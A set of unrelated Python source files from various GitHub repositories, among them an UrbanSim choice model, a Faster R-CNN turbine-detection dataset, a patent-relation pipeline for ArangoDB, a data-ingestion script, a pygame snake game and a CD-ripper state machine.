                                                         debuglevel=debuglevel,
                                                         dataset_pool=dataset_pool)
    def run(self, agents_index=None, n=500, *args, **kwargs):
        """Run the choice model and store choices in `is_chosen`.

        agents_index: ignored whenever `filter` is set (recomputed below).
        n: currently unused — the sampling-model run at the bottom is
           commented out.
        """
        agent_set = self.proposal_set
        if self.filter is not None:
            # Recompute the affected proposals from the filter expression.
            agents_index = where( self.proposal_set.compute_variables(self.filter) )[0]
        choices = ChoiceModel.run(self, agent_set=agent_set, agents_index=agents_index, *args, **kwargs)
        #logger.log_status("%s workers chose to work at home, %s workers chose to work out of home." %
        #(where(agent_set.get_attribute_by_index(self.choice_attribute_name, kwargs['agents_index']) == 1)[0].size,
        #where(agent_set.get_attribute_by_index(self.choice_attribute_name, kwargs['agents_index']) == 2)[0].size))
        #logger.log_status("Total: %s workers work at home, %s workers work out of home." %
        #(where(agent_set.get_attribute(self.choice_attribute_name) == 1)[0].size,
        #where(agent_set.get_attribute(self.choice_attribute_name) == 2)[0].size))
        self.proposal_set.set_values_of_one_attribute('is_chosen',
                                                      choices,
                                                      index=agents_index)
        #DevelopmentProjectProposalSamplingModel.run(self, n=n)
    def prepare_for_run(self,
                        specification_storage=None,
                        specification_table=None,
                        coefficients_storage=None,
                        coefficients_table=None,
                        data_objects=None,
                        **kwargs):
        """Load specification and coefficients from storage.

        Returns (specification, coefficients).
        NOTE(review): `data_objects` is accepted but never used here.
        """
        spec, coeff = prepare_specification_and_coefficients(specification_storage=specification_storage,
                                                             specification_table=specification_table,
                                                             coefficients_storage=coefficients_storage,
                                                             coefficients_table=coefficients_table, **kwargs)
        return (spec, coeff)
    def prepare_for_estimate(self, specification_dict = None,
                             specification_storage=None,
                             specification_table=None,
                             agent_set=None,
                             agents_for_estimation_storage=None,
                             agents_for_estimation_table=None,
                             filter_for_estimation_set=None,
                             data_objects=None):
        """Build the estimation specification and mark the estimation set.

        Proposals present in the estimation table (matched on parcel_id,
        template_id, is_redevelopment) get value 1 in the choice attribute;
        all others get 2.

        Returns (specification, agents_index).

        NOTE(review): `agents_index` is only assigned when self.filter is
        not None; with filter=None the final return raises NameError —
        confirm whether a None filter is a legal configuration here.
        """
        specification = get_specification_for_estimation(specification_dict,
                                                         specification_storage,
                                                         specification_table)
        if self.filter is not None:
            agents_index = where( self.proposal_set.compute_variables(self.filter) )[0]
        # composite key identifying a proposal in the estimation table
        id_attribute_name = ['parcel_id', 'template_id', 'is_redevelopment']
        if agents_for_estimation_storage is not None:
            estimation_set = Dataset(in_storage = agents_for_estimation_storage,
                                     in_table_name=agents_for_estimation_table,
                                     id_name=id_attribute_name,
                                     dataset_name=agent_set.get_dataset_name())
            filter_index = arange(estimation_set.size())
            if filter_for_estimation_set:
                filter_index = where(estimation_set.compute_variables(filter_for_estimation_set, resources=Resources(data_objects)))[0]
            estimation_set.subset_by_index(filter_index, flush_attributes_if_not_loaded=False)
            # Assemble the composite id columns of agent_set side by side.
            id_attributes = None
            for attr_name in id_attribute_name:
                attr_value = agent_set.get_attribute_as_column(attr_name)
                if id_attributes == None:
                    # first column starts the matrix
                    id_attributes = attr_value
                else:
                    id_attributes = concatenate((id_attributes, attr_value), axis=1)
            # -1 marks proposals absent from the estimation set
            id_index = estimation_set.try_get_id_index(id_attributes, return_value_if_not_found=-1)
            status_id = 2 * ones(agent_set.size(), dtype="int8")
            status_id[where(id_index != -1)] = 1
            name = self.choice_attribute_name.get_alias()
            if name in agent_set.get_known_attribute_names():
                agent_set.set_values_of_one_attribute(name, status_id[where(id_index != -1)], where(id_index!=-1)[0])
            else:
                agent_set.add_primary_attribute(status_id, name)
        return (specification, agents_index)
| psrc/urbansim | urbansim_parcel/models/development_project_proposal_choice_model.py | development_project_proposal_choice_model.py | py | 7,581 | python | en | code | 4 | github-code | 36 |
39140033433 | import argparse
import os
from time import sleep
# === subroutines ===
def collect_files_for_removal(root: str, ext: str = '.class') -> tuple[list[str], list[str]]:
    """Collect compiler-output files and the sub-directories holding them.

    Walks *root* bottom-up so the returned directories can be removed in
    order (children before parents). *root* itself is excluded from the
    directory list so the cleanup never deletes the output directory.

    Args:
        root: directory to scan; if it does not exist, ([], []) is returned.
        ext: file extension to match (default '.class', the original
            hard-coded behaviour).

    Returns:
        (folders, files): sub-directories of root, deepest first, and the
        matching files found anywhere under root.
    """
    if not os.path.exists(root):
        return ([], [])
    res_files: list[str] = []
    res_folders: list[str] = []
    for dir_path, _dirs, files in os.walk(root, topdown=False):
        res_files.extend(os.path.join(dir_path, name)
                         for name in files if name.endswith(ext))
        res_folders.append(dir_path)
    # With topdown=False, root is always the final entry of the walk.
    res_folders.remove(root)
    return (res_folders, res_files)
# === CLI and Environment ===
# NOTE(review): `workdir` is computed but never used below.
workdir = os.path.abspath(os.curdir)
parser = argparse.ArgumentParser()
parser.add_argument(
    '--output-dir', metavar='DIR', default='out',
    help='a directory with *.CLASS files')
args = parser.parse_args()
output_dir = args.output_dir
# === main ===
output_dir = os.path.abspath(output_dir)
print('[i] Cleaning output directory:', output_dir)
# Gather everything up front, then delete files before their parent folders.
dirs, files = collect_files_for_removal(output_dir)
# files first
for path in files:
    os.remove(path)
# then folders (deepest first, as returned by the bottom-up walk)
for path in dirs:
    os.rmdir(path)
print('[i] Done!')
# Brief pause so the final message stays visible when run from a launcher.
sleep(1)
| vpa-research/jsl-spec-generated | clear.py | clear.py | py | 1,122 | python | en | code | 0 | github-code | 36 |
73521408425 | import numpy as np
import pandas as pd
import os
import cv2
import re
import torch
import torchvision
from torchvision import transforms
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
from torch.utils.data import DataLoader, Dataset
from torch.utils.data.sampler import SequentialSampler
from matplotlib import pyplot as plt
from sklearn.model_selection import KFold
from tqdm import tqdm
class TurbineDataset(Dataset):
    """Object-detection dataset over annotated turbine imagery.

    Each row of *dataframe* describes one bounding box for an image path in
    its 'image' column (box columns: minx/miny/maxx/maxy). In training mode
    ``__getitem__`` returns (image, target, image_id); in inference mode it
    returns (image, image_id) only.

    Args:
        dataframe: annotation table with an 'image' column plus box columns.
        transforms: optional callable applied to each loaded image.
        train: True for training (targets included), False for inference.
    """

    def __init__(self, dataframe, transforms=None, train=True):
        super().__init__()
        self.df = dataframe
        # one entry per distinct image path, in first-seen order
        self.image_ids = dataframe['image'].unique()
        self.transforms = transforms
        self.train = train

    def __len__(self) -> int:
        """Number of distinct images in the dataset."""
        return self.image_ids.shape[0]

    def __getitem__(self, index: int):
        """Load image *index*; in training mode also build its target dict."""
        image_id = self.image_ids[index]
        # Load as RGB float32 scaled to [0, 1].
        bgr = cv2.imread(image_id, cv2.IMREAD_COLOR)
        image = cv2.cvtColor(bgr, cv2.COLOR_BGR2RGB).astype(np.float32) / 255.0
        if self.transforms is not None:
            image = self.transforms(image)
        if self.train is False:
            return image, image_id
        # All annotation rows belonging to this image.
        records = self.df[self.df['image'] == image_id]
        boxes = torch.as_tensor(
            records[['minx', 'miny', 'maxx', 'maxy']].values, dtype=torch.float32)
        heights = boxes[:, 3] - boxes[:, 1]
        widths = boxes[:, 2] - boxes[:, 0]
        num_boxes = records.shape[0]
        target = {
            'boxes': boxes,
            # single foreground class: every box is labelled 1
            'labels': torch.ones((num_boxes,), dtype=torch.int64),
            'image_id': torch.tensor([index]),
            'area': torch.as_tensor(heights * widths, dtype=torch.float32),
            'iscrowd': torch.zeros((num_boxes,), dtype=torch.int64),
        }
        return image, target, image_id
class Averager:
    """Incrementally track the mean of a stream of numbers.

    Typical use: accumulate per-batch losses during a training epoch and
    read the running mean from the ``value`` property. When no values have
    been added, ``value`` is 0 (never a ZeroDivisionError).
    """

    def __init__(self):
        self.current_total = 0.0  # running sum of all values seen
        self.iterations = 0.0     # count of values added so far

    def send(self, value):
        """Fold *value* into the running total and bump the count."""
        self.current_total += value
        self.iterations += 1

    @property
    def value(self):
        """Mean of the values seen so far, or 0 if nothing was added."""
        if self.iterations:
            return 1.0 * self.current_total / self.iterations
        return 0

    def reset(self):
        """Discard all accumulated state."""
        self.current_total = 0.0
        self.iterations = 0.0
def collate_fn(batch):
    """Transpose a batch of per-sample tuples into per-field tuples.

    Given ``[(img1, tgt1), (img2, tgt2), ...]`` this returns
    ``((img1, img2, ...), (tgt1, tgt2, ...))`` — the layout a DataLoader
    needs when samples carry variable-sized annotations that must not be
    stacked into a single tensor.

    Args:
        batch: list of equal-length tuples, one tuple per sample.

    Returns:
        tuple: one inner tuple per field, holding that field's values
        across the whole batch (empty tuple for an empty batch).
    """
    fields = zip(*batch)
    return tuple(fields)
def prepare_batches_for_training(folds: dict, selected_data: "gdp.GeoDataFrame", number_of_fold: int):
    """Build train/test DataLoaders for one cross-validation fold.

    Args:
        folds: mapping fold-number -> {'train': [...], 'test': [...]} of
            image paths (assumed — TODO confirm against the fold builder).
        selected_data: annotation table with one row per bounding box and
            an 'image' column. NOTE(review): `gdp` is never imported in this
            module; the annotation is quoted here so it is not evaluated at
            definition time (the original raised NameError when this def
            executed) — confirm the intended module (geopandas?).
        number_of_fold: key into `folds` selecting the split to use.

    NOTE(review): no return statement is visible in this chunk — presumably
    (train_data_loader, test_data_loader) should be returned; verify against
    the full file and its callers.
    """
    trans = transforms.Compose([transforms.ToTensor()])
    train_df = selected_data[selected_data['image'].isin(folds[number_of_fold]['train'])]
    test_df = selected_data[selected_data['image'].isin(folds[number_of_fold]['test'])]
    train_dataset = TurbineDataset(train_df, trans,True)
    test_dataset = TurbineDataset(test_df, trans,True)
    # NOTE(review): `indices` is computed but never used (shuffle=False
    # below); dead-code candidate.
    indices = torch.randperm(len(train_dataset)).tolist()
    train_data_loader = DataLoader(
        train_dataset,
        batch_size=16,
        shuffle=False,
        num_workers=4,
        collate_fn=collate_fn
    )
    test_data_loader = DataLoader(
        test_dataset,
        batch_size=8,
        shuffle=False,
        num_workers=4,
        collate_fn=collate_fn
    )
| fparaggio/wind-turbine-detector | src/wind_turbine_detector/pipelines/train/nodes.py | nodes.py | py | 7,569 | python | en | code | 0 | github-code | 36 |
def wrap(string, max_width):
    """
    Split a string into newline-separated chunks of at most max_width
    characters.

    Fix: the original looped over range(len(string)) — one iteration per
    character — producing mostly-empty slices and a trailing newline per
    iteration; its IndexError handler was dead code because slicing never
    raises IndexError. Stepping by max_width yields exactly
    ceil(len(string) / max_width) lines.

    Parameters
    ----------
    string : string
        Input string.
    max_width : int
        Maximum number of characters per line.

    Returns
    -------
    result : string
        The wrapped string, lines joined by newlines (no trailing newline).
    """
    return "\n".join(string[i:i + max_width]
                     for i in range(0, len(string), max_width))
string, max_width = "ABCDEFGHIJKLIMNOQRSTUVWXYZ", 4
result = wrap(string, max_width)
print(result)
| scouvreur/hackerrank | python/strings/text_wrap.py | text_wrap.py | py | 743 | python | en | code | 1 | github-code | 36 |
31474544931 | #!/home/apollo/anaconda3/bin/python3
#-*- coding: utf-8 -*-
#******************************************************************************
# Author : jtx
# Create : 2020-03-31 19:05
# Last modified: 2020-04-09 14:18
# Filename : patent_kbp.py
# Description : 专利-->企业 关系添加
#******************************************************************************
import configparser
import sys
from pymongo import MongoClient
from pymongo import errors
from pyArango.connection import Connection as ArangoConnection
from pyArango.theExceptions import AQLFetchError
import pymysql
from dateutil import parser
import datetime
import json
import logging
import re
import copy
import requests
import os
# Root logger configuration: timestamped records tagged with file and line.
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
# config.ini lives one directory above this script (the kbp package root).
dir_path = os.path.dirname(__file__)
kbp_path = os.path.dirname(dir_path)
config_path = os.path.join(kbp_path,"config.ini")
class RelationPipeline(object):
    def __init__(self):
        """Load config.ini, connect to the ArangoDB patent/company
        collections, and preload the division/industry relation schemas
        from MySQL."""
        self.config = configparser.ConfigParser()
        self.config.read(config_path)
        self.arango_con = ArangoConnection(arangoURL=self.config.get("arango","arango_url"),username= self.config.get("arango","user"),password=self.config.get("arango","passwd"))
        self.arango_db = self.arango_con[self.config.get("arango","db")]
        self.kb_patent = self.arango_db[self.config.get("arango","kb_patent")]
        self.kb_company = self.arango_db[self.config.get("arango","kb_company")]
        self.industry_url = self.config.get("url","patent_classifier")
        self._init_division_schema() # init division_schema from mysql
        self._init_industry_schema()
        # number of relation records updated in ArangoDB
        self.count_graph_update = 0
        # total number of relations to add for the processed date
        self.total = 0
def _init_division_schema(self):
'''
行政区域实体关系加载
'''
self.division_schema = {}
sql_conn = pymysql.connect( host = self.config.get("mysql","host") ,
user = self.config.get("mysql","user") ,
passwd = self.config.get("mysql","passwd"),
port = self.config.getint("mysql","port") ,
db = self.config.get("mysql","db"),
charset = "utf8" )
sql_cur = sql_conn.cursor()
# 初始化行政区域的关系schema
sql_query_industry = "select name, id, level, parent_id from {}".format(self.config.get("mysql","res_division"))
sql_cur.execute(sql_query_industry)
divisions = sql_cur.fetchall()
for division in divisions:
division_name, division_id, division_level, division_parent_id = division
self.division_schema[division_name] = {
"relation_type":"concept_relation/100004",
"object_name":division_name,
"object_type": "division",
"object_id": division_id
}
sql_cur.close()
sql_conn.close()
logger.info("MYSQL division schema 加载完成")
def _init_industry_schema(self):
'''
init loading industry schema at mysql res_industry table
'''
self.industry_schema = {}
sql_conn = pymysql.connect( host = self.config.get("mysql","host") ,
user = self.config.get("mysql","user") ,
passwd = self.config.get("mysql","passwd"),
port = self.config.getint("mysql","port") ,
db = self.config.get("mysql","db"),
charset = "utf8" )
sql_cur = sql_conn.cursor()
# 初始化产业/产业领域 schema
sql_query_industry = "select name, id, parent_id from {}".format(self.config.get("mysql","res_industry"))
sql_cur.execute(sql_query_industry)
labels = sql_cur.fetchall()
for industry in labels:
industry_name, industry_id, parent_id = industry
self.industry_schema[industry_id] = {
"relation_type":"concept_relation/100011",
"object_name":industry_name,
"object_type": "industry",
"object_id": industry_id,
"object_parent_id": parent_id
}
def query_process_patent(self, process_date):
if process_date == "yesterday":
process_date = (datetime.date.today() - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
elif process_date == "today":
process_date = datetime.today().strftime("%Y-%m-%d")
elif len(process_date.split("-")) == 3:
process_date = process_date
else:
raise Exception("无效参数")
iso_date_str = process_date + 'T00:00:00+08:00'
iso_date = parser.parse(iso_date_str)
aql = "FOR patent IN {} FILTER patent.create_time >= '{}' SORT patent.create_time return patent".format(
self.config.get("arango","kb_patent"), iso_date)
try:
res = self.arango_db.fetch_list(aql)
except AQLFetchError as e:
'''没有查到相关数据时,fetch_list会抛出异常'''
res = []
logger.warn("Arango专利库没有查到数据",e)
self.total = len(res)
self.process_date = process_date
logger.info("[{}],专利知识库查到待处理数据[{}]个".format(process_date, self.total))
return res
def get_related_industry_tags(self, industry_id):
'''
根据子领域名称递归返回领域及所有父领域标签
'''
relations = []
# 过滤招商领域与图谱定义不一致的
if not industry_id in self.industry_schema:
return relations
relations.append(self.industry_schema[industry_id])
parent_id = self.industry_schema[industry_id]["object_parent_id"]
while (parent_id):
node = self.industry_schema[parent_id]
relations.append(node)
parent_id = node["object_parent_id"]
return relations
def process_company_rel(self, properties):
'''专利所属企业关系建立'''
company_rels = []
applicants = properties["applicant"]
applicant = list(set(applicants))
for applicant in applicants:
company = self.kb_company.fetchFirstExample({"name": applicant})
if not company:
continue
company = company[0] # company返回的是cursor
company_rel = {
"relation_type":"concept_relation/100001",
"object_name": company["name"],
"object_type": "company",
"object_id": company["_id"]
}
company_rels.append(company_rel)
return company_rels
def process_industry_rel(self, _key):
'''
产业领域标签ID化添加
'''
industry_tags = []
industry_field_tags = []
patent_id = _key
post_data = {
"patent_id": patent_id ,
}
pack_data = json.dumps(post_data)
try:
res = requests.post(self.industry_url, data=pack_data)
if res.status_code == 200:
tags = res.json().get("body")
industry_field_tags.extend(tags)
except Exception as e:
logging.error("获取专家产业领域失败,专家id=[{}],接口=[{}]".format(patent_id,self.industry_url),e)
for field in industry_field_tags:
for node in self.get_related_industry_tags(field["id"]):
if node not in industry_tags:
industry_tags.append(node)
return industry_tags
def process_division_rel(self, properties):
div_rel = []
province = properties["province"]
city = properties["city"]
area = properties["area"]
if province and province in self.division_schema.keys():
if province in ["北京市","上海市","重庆市","天津市"]:
province = province.replace("市","")
div_rel.append(self.division_schema[province])
if city and city in self.division_schema.keys():
if city in ["北京","上海","重庆","天津"]:
div_rel.append(self.division_schema[city+'市'])
if area and area in self.division_schema.keys():
div_rel.append(self.division_schema[area])
return div_rel
def process_relations(self, properties, _key):
'''
添加关系
'''
relations = []
company_rel = self.process_company_rel(properties)
relations.extend(company_rel)
# 关联产业分类
industry_rel = self.process_industry_rel(_key)
relations.extend(industry_rel)
# 籍贯关联的行政区划
#division_rel = self.process_division_rel(properties)
#relations.extend(division_rel)
return relations
def process(self, scan_date):
process_patents = self.query_process_patent(scan_date)
count = 0
# arango数据库专利信息处理
for patent in process_patents:
count += 1
#logger.info("处理专利关系,专利名=[{}]".format(patent["name"]))
patent_key = patent["_key"]
relations = self.process_relations(patent["properties"], patent_key)
try:
doc = self.kb_patent[patent_key]
doc["relations"] = relations
doc["update_time"] = datetime.datetime.today()
doc.save()
self.count_graph_update += 1
except Exception as e:
logger.error("专利关系添加失败,专利名=[{}],id=[{}]".format(patent["name"],patent_key))
if count % 100 == 0 or count == self.total:
logger.info("前[{}]家专利关系添加完成".format(count))
logger.info("日期[{}]专利知识库共找到专利{}个,arango专利库添加专利关系{}个".format(
self.process_date, self.total, self.count_graph_update))
if __name__=="__main__":
    # Earliest available date in the patent knowledge base: 2019-06-03.
    # Process the date given on the command line, or default to yesterday.
    # NOTE(review): `sys` is expected to be imported near the top of this
    # module (above the visible chunk) — confirm.
    rel = RelationPipeline()
    if len(sys.argv) > 1:
        rel.process(sys.argv[1])
    else:
        rel.process("yesterday")
| RogerJTX/KbpPipeline_ExpertSystem | patent/patent_relation.py | patent_relation.py | py | 10,621 | python | en | code | 3 | github-code | 36 |
26072099672 | from PySide2 import QtWidgets
from PySide2.QtCore import Signal
# widget to get input for vector 3 types
class Vector3Widget(QtWidgets.QWidget):
    """Widget exposing three spin boxes to edit an integer 3-vector."""

    # Signals
    on_value_changed = Signal(tuple)  # emitted with the new (x, y, z) tuple

    _main_layout = None

    def __init__(self, value=(0, 0, 0)):
        """Create the widget initialised to *value* (an (x, y, z) tuple)."""
        QtWidgets.QWidget.__init__(self)
        self._value = value

        # main layout
        self._main_layout = QtWidgets.QGridLayout()
        self._main_layout.setSpacing(0)
        self.setLayout(self._main_layout)

        # input fields
        self._unit_1_field = None
        self._unit_2_field = None
        self._unit_3_field = None
        self._create_ui()

    def _create_ui(self):
        """Build one spin box per vector component and add them to the layout."""
        # Previously built with three duplicated stanzas; one helper keeps
        # the fields consistent.
        self._unit_1_field = self._make_field(self._value[0])
        self._unit_2_field = self._make_field(self._value[1])
        self._unit_3_field = self._make_field(self._value[2])

        # add to layout (same grid cells as before)
        self._main_layout.addWidget(self._unit_1_field, 1, 2)
        self._main_layout.addWidget(self._unit_2_field, 1, 3)
        self._main_layout.addWidget(self._unit_3_field, 1, 4)

    def _make_field(self, initial):
        # One spin box initialised to a component value, wired to re-emit changes.
        field = QtWidgets.QSpinBox()
        field.setValue(initial)
        field.editingFinished.connect(self._on_field_value_changed)
        return field

    def _on_field_value_changed(self, value=0):
        # Re-broadcast the whole vector whenever any single component is edited.
        self.on_value_changed.emit(self.get_value())

    def get_value(self):
        """Return the current (x, y, z) tuple read from the spin boxes."""
        return (self._unit_1_field.value(), self._unit_2_field.value(), self._unit_3_field.value())
13758234528 |
def sliding_window(img, size, step, extent=280):
    """Generate occluded copies of a 2-D image for occlusion analysis.

    For every (y, x) offset on a grid covering [0, extent) with stride
    *step*, a copy of *img* is produced with a size x size square zeroed at
    that offset.  Offsets beyond the image simply leave the copy unchanged
    (empty slice), matching the original behaviour.

    Parameters
    ----------
    img : ndarray, 2-D image
    size : int, side length of the zeroed square
    step : int, stride of the occlusion grid
    extent : int, exclusive upper bound of the offset grid
        (default 280 preserves the original hard-coded range)

    Returns
    -------
    ndarray of shape (n_windows, H, W)

    Fix: the original grew the result with np.concatenate inside the loop
    (quadratic copying); windows are now collected and stacked once.
    """
    windows = []
    for y in range(0, extent, step):
        for x in range(0, extent, step):
            occluded = np.copy(img)
            occluded[y:y + size, x:x + size] = 0
            windows.append(occluded)
    if not windows:
        return np.empty((0,) + img.shape, dtype=img.dtype)
    return np.stack(windows)
# Run the occlusion sweep over two images and plot the 28x28 prediction maps.
# NOTE(review): pic1, pic2, pic3_re, model, np and plt are presumably defined
# earlier in this file (outside the visible chunk) — confirm.
pic1_window = sliding_window(pic1, 60, 10)
pic1_pred = np.round(model.predict(pic1_window))
# 28x28 grid = 280 offsets / step 10 in each direction.
pic1_re = np.reshape(pic1_pred, (28,28))
pic1_re_flip = np.fliplr(pic1_re)
pic2_window = sliding_window(pic2, 60, 10)
pic2_pred = np.round(model.predict(pic2_window))
pic2_re = np.reshape(pic2_pred, (28,28))
pic2_re_flip = np.fliplr(pic2_re)
# Heat map for pic3_re: colorbar labels count deviation from ground truth (GT).
fig, ax = plt.subplots()
cax = ax.imshow(pic3_re, clim=(4.0, 7), cmap='hot')
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
ticks=[7,6,5,4,3]
cbar = fig.colorbar(cax, ticks=ticks, boundaries=[4,5,6,7,8])
loc = [7.5, 6.5, 5.5, 4.5]
cbar.set_ticks(loc)
cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3'])
plt.show()
# fig, ax = plt.subplots()
# cax = ax.imshow(pic1_re, clim=(11.0, 17), cmap='hot')
# ax.axes.get_xaxis().set_ticks([])
# ax.axes.get_yaxis().set_ticks([])
# ticks=[18,17,16,15,14,13,12]
# cbar = fig.colorbar(cax, ticks=ticks, boundaries=[11,12,13,14,15,16,17,18])
# loc = [17.5, 16.5, 15.5 , 14.5, 13.5, 12.5, 11.5]
# cbar.set_ticks(loc)
# cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3','-4','-5','-6'])
# plt.show()
# Heat map for the mirrored pic2 prediction map, same labelling scheme.
fig, ax = plt.subplots()
cax = ax.imshow(pic2_re_flip, clim=(8.0, 12), cmap='hot')
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
ticks=[13,12,11,10,9,8]
cbar = fig.colorbar(cax, ticks=ticks, boundaries=[8,9,10,11,12,13])
loc = [12.5, 11.5, 10.5, 9.5, 8.5]
cbar.set_ticks(loc)
cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3','-4','-5'])
plt.show()
| andobrescu/Leaf-Counting | Learning_box _vis.py | Learning_box _vis.py | py | 1,801 | python | en | code | 4 | github-code | 36 |
36683998868 | import os
import json
from typing import List
from datetime import datetime
import pandas as pd
#############Load config.json and get input and output paths
# All runtime paths/names are driven by config.json in the working directory.
with open('config.json','r') as f:
    config = json.load(f)
# Source datasets, merged output location, and the two output file names.
input_folder_path = config['input_folder_path']
output_folder_path = config['output_folder_path']
ingestion_record_file_name = config['ingestion_record_file_name']
ingestion_file_name = config['ingestion_file_name']
#############Function for data ingestion
def read_tabular_file(dir_name: str, file_name: str):
    """Load a comma-separated UTF-8 file from *dir_name* into a DataFrame."""
    full_path = os.path.join(dir_name, file_name)
    return pd.read_csv(full_path, sep=',', encoding='utf-8')
def clean_dataframe(df: pd.DataFrame):
    """Return *df* with exact duplicate rows removed (original index kept)."""
    return df.drop_duplicates()
def save_dataframe(df, output_dir_name: str, file_name: str):
    """Write *df* to *output_dir_name*/*file_name* as CSV without the index."""
    target = os.path.join(output_dir_name, file_name)
    df.to_csv(target, sep=',', encoding='utf-8', index=False)
def write_ingested_file_record(file_name: str, file_dir: str, ingested_file_loc: str, ingested_file_name: str, ingested_file_length: int):
    """Append one tab-separated provenance line to *file_dir*/*file_name*.

    Fields: timestamp, source folder, source file name, row count.

    Fix: the template wrote a literal "(unknown)" where the file name
    belongs, while the ``filename`` keyword argument was silently ignored
    by str.format; the placeholder is restored.
    """
    record_path = os.path.join(file_dir, file_name)
    with open(record_path, 'a') as f:
        f.write("{datetime}\t{location}\t{filename}\t{length}\n".format(
            datetime=datetime.now(),
            location=ingested_file_loc,
            filename=ingested_file_name,
            length=ingested_file_length
        ))
def merge_multiple_dataframe(input_folder_dir: str,
                             output_folder_dir: str,
                             output_file_name: str,
                             record_file_name: str,
                             data_cols: List[str] = ["corporation", "lastmonth_activity", "lastyear_activity", "number_of_employees", "exited"]):
    """Compile every dataset in *input_folder_dir* into one de-duplicated file.

    A provenance line is appended to *record_file_name* in
    *output_folder_dir* for each source file; the merged, de-duplicated
    result is written as *output_file_name* in *output_folder_dir*.

    Fixes:
    - the merged output was saved under the module-global
      ``output_folder_path`` instead of the ``output_folder_dir`` parameter;
    - ``DataFrame.append`` (removed in pandas 2.0) replaced by ``pd.concat``.

    Note: the mutable list default is kept for interface compatibility;
    it is never mutated here.
    """
    frames = [pd.DataFrame(columns=data_cols)]  # seed keeps columns even with no input files
    for file_name in os.listdir(input_folder_dir):
        df = read_tabular_file(input_folder_dir, file_name)
        frames.append(df)
        write_ingested_file_record(record_file_name, output_folder_dir,
                                   input_folder_dir, file_name, len(df))
    merged = clean_dataframe(pd.concat(frames))
    save_dataframe(merged, output_folder_dir, output_file_name)
if __name__ == '__main__':
    # Run one ingestion pass using the paths loaded from config.json.
    merge_multiple_dataframe(input_folder_path, output_folder_path, ingestion_file_name, ingestion_record_file_name)
| wonyoungseo/ex-risk-assessment-ml-model-deployment-monitoring-system | ingestion.py | ingestion.py | py | 2,461 | python | en | code | 0 | github-code | 36 |
23228731915 | import sys
import time
import random
import pygame
from event_listener import event_listener
from functions import render_all, one_dimensional_list, update_frames
sys.path.insert(1, 'player')
from yoshi import Yoshi
from movement import move_all, set_direction, move
sys.path.insert(1, 'eggs')
from egg import Egg
sys.path.insert(1, 'end_game')
from end_game import end_game
from death_collided import collided_walls
pygame.init()
# Setting app name.
pygame.display.set_caption("Yoshi Snake Game.")
# It should be 17x15.
SCREEN_WIDTH = 680
SCREEN_HEIGHT = 600
GREEN = (31, 134, 31)
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
yoshis = []
eggs = []
objects = []
objects.append(yoshis)
objects.append(eggs)
# Creating player character.
player = Yoshi()
yoshis.append(player)
# Testing egg.
eggy = Egg("green")
eggs.append(eggy)
# Allows player to choose first direction.
direction = ""
score = 1
frame = 0
# Main game loop: render, check for game over, read input, then advance state.
while True:
    # Rendering frame
    # Reseting screen for every frame.
    screen.fill(GREEN)
    # Rendering all objects
    render_all( one_dimensional_list(objects), screen )
    # Flip the display
    pygame.display.flip()
    # Verifying if player lost:
    if collided_walls(player, SCREEN_WIDTH, SCREEN_HEIGHT):
        end_game(screen)
    # Fixed frame delay (~2 FPS game tick).
    time.sleep(0.5)
    # Taking input.
    last_relevant_event = event_listener()
    # Closing game if clicked to quit:
    if last_relevant_event == "quit":
        sys.exit(0)
    # Preparing for the next rendering:
    move_all(yoshis)
    direction = set_direction(direction, last_relevant_event)
    move(player, direction, 40, 40)
    # Checking egg collision.
    if eggy.check_collision(player):
        # Grow the snake: spawn a new segment at the player's position.
        new_yoshi = Yoshi(x = player.x, y = player.y, current_frame = frame)
        yoshis.append(new_yoshi)
        # Changing egg location.
        eggy.x = random.randint(0, 16) * 40
        eggy.y = random.randint(0, 14) * 40
        score += 1
        pygame.display.set_caption("Yoshi's Snake Game." + " " * 3 + "Score: " + str(score))
    # Updating gif frames.
    update_frames(one_dimensional_list(objects))
    frame += 1
| mignoe/Games | yoshi-snake-game/game.py | game.py | py | 2,214 | python | en | code | 3 | github-code | 36 |
11303986062 | from enum import Enum
import logging
from pathlib import Path
from transitions import Machine
from ..config import ALBUM_FOLDER_NAME_TEMPLATE
from ..config import MUSIC_PATH_NAME
from ..config import TRACK_FILE_NAME_TEMPLATE
from ..config import VA_ALBUM_FOLDER_NAME_TEMPLATE
logger = logging.getLogger(__name__)
class States(Enum):
    """Top-level states of the ripping state machine (see create_ripper)."""
    NO_DISC = 1      # idle, no disc present
    KNOWN_DISC = 2   # inserted disc was already ripped
    RIPPING = 3      # tracks are being extracted
    DONE = 4         # rip finished and disc id stored
class Triggers(object):
    """Names of the transitions registered on the state machine."""
    START = 'start'
    KNOWN_DISC = 'known_disc'
    RIP_TRACK = 'rip_track'
    FINISH = 'finish'
    EJECT = 'eject'
class Ripper(object):
    """CD-ripping workflow driven by a ``transitions`` state machine.

    All side-effecting operations (grab/convert a track, create folders,
    write tags, move files, persist the disc id) are injected as callables;
    states and transitions are attached externally by ``create_ripper``.
    """
    def __init__(
        self,
        grab_and_convert_track_func,
        create_folder_func,
        write_meta_func,
        move_track_func,
        write_disc_id_func,
        after_state_change_callback
    ):
        self.grab_and_convert_track_func = grab_and_convert_track_func
        self.create_folder_func = create_folder_func
        self.write_meta_func = write_meta_func
        self.move_track_func = move_track_func
        self.write_disc_id_func = write_disc_id_func
        self.after_state_change_callback = after_state_change_callback
        self._clear_internal_state()
    def _clear_internal_state(self):
        # Reset per-disc state; also used as the EJECT transition hook.
        self.disc_meta = None
        self.track_list = None
        self.current_track = None
        self.folder_path = None
    def set_disc_meta(self, disc_meta):
        """Store disc metadata and reset rip progress (START hook)."""
        self.disc_meta = disc_meta
        self.track_list = []
        self.current_track = 0
    def create_folder(self, disc_meta):
        """Create the destination album folder for this disc (START hook)."""
        self.folder_path = self._get_folder_path(disc_meta)
        self.create_folder_func(self.folder_path)
    def _get_folder_path(self, disc_meta):
        """Build the album folder path; falls back to the various-artists
        template when no 'artist' key is present, and adds a CD<N>
        subfolder for multi-disc sets."""
